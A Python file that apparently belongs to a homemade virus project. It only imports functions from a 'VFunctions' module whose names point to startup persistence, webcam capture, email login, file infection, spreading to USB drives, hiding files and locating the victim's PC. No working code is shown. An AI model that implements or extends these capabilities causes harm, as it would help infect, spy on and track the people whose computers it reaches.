from VFunctions import cts
from VFunctions import ctl
from VFunctions import ctus
from VFunctions import cts_r
from VFunctions import ctl_r
from VFunctions import ctus_r
from VFunctions import Paste_In_To_Startup
from VFunctions import Rick_Roll
from VFunctions import Web_Cam_Photo
from VFunctions import Log_IN_To_Email
from VFunctions import SWCPE
from VFunctions import SPCLE
from VFunctions import Log_Out_Of_Email
from VFunctions import Infect_Files
from VFunctions import You_are_an_idiot
from VFunctions import Chage_Background
from VFunctions import Get_Ip
from VFunctions import Pc_location
from VFunctions import Hide_file
from VFunctions import Paste_To_USB